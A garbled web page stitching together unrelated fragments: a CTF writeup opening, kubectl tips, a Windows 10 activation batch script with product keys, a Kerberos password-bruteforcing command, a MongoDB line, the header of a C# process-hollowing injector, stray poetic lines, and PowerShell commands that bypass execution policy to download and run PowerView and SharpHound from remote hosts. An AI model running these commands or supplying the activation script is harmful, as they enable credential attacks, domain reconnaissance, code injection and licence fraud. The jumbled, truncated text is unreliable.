tanaka tanaka-geek

h1-212 CTF Writeup

As an avid CTF'er, I was very much excited when I heard about the H1-212 CTF. Thus, letting my misguided priorities get the better of me, I decided to set my studies aside and try this HackerOne CTF 😄

It didn't take me too long though to realize that I suck at bug bounties and that this challenge wasn't going to be easy...

⚒️ The challenge 🛠️

kubectl one-liners

Enable kubectl completion (needs the bash-completion package):

source <(kubectl completion bash)

Dry-run, outputs Service (--expose) and a Deployment in yaml:

kubectl run --image=apache \ 
--port=80 \

Windows 10 Active process

Step 1. Fast create a .txt file.
step 2. Then Copy this .text and past on the .txt file .

@echo off
title Windows 10 ALL version activator&cls&echo ************************************ 
&echo Copyright: Youtube: ithelpbd.com &echo.&echo Supported products:&echo - Windows 10 Home&echo - Windows 10 Professional&echo - Windows 10 Enterprise, Enterprise LTSB&echo - Windows 10 Education&echo.&echo.&echo ************************************ &echo Windows 10 activation...
cscript //nologo c:\windows\system32\slmgr.vbs /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 3KHY7-WNT83-DGQKR-F7HPR-844BM >nul

Product Security Testing

IDA Pro and Decompilers Website
Software Security Testing
Introduction to Risk Analysis
Introduction to Fuzzing
The Art Of Software Security Assessment", by Mark Dowd, McDonald, Schuh, 2006
- *Not on the recommended list, but a useful resource

Crypto

*Not on the recommended lists, but I think SANS would be better off having students just work on these all day

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

MongoDB Cheat Sheet

Show All Databases

show dbs


	/***************
	* Simple Process Hollowing in C#
	*
	* #Build Your Binaries
	* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
	*
	* @author: Michael Gorelik <[email protected]>
	* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
	* #Most of the code taken from here: @github: github.com/ambray

	A blood black nothingness began to spin.

	Began to spin.

	Let's move on to system.

	System.

	Feel that in your body.

	# Domain Recon
	## ShareFinder - Look for shares on network and check access under current user context & Log to file
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess\|Out-File -FilePath sharefinder.txt"

	## Import PowerView Module
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"

	## Invoke-BloodHound for domain recon
	powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

	$Win32 = @"
	using System;
	using System.Runtime.InteropServices;

	public class Win32 {

	[DllImport("kernel32")]
	public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

	[DllImport("kernel32")]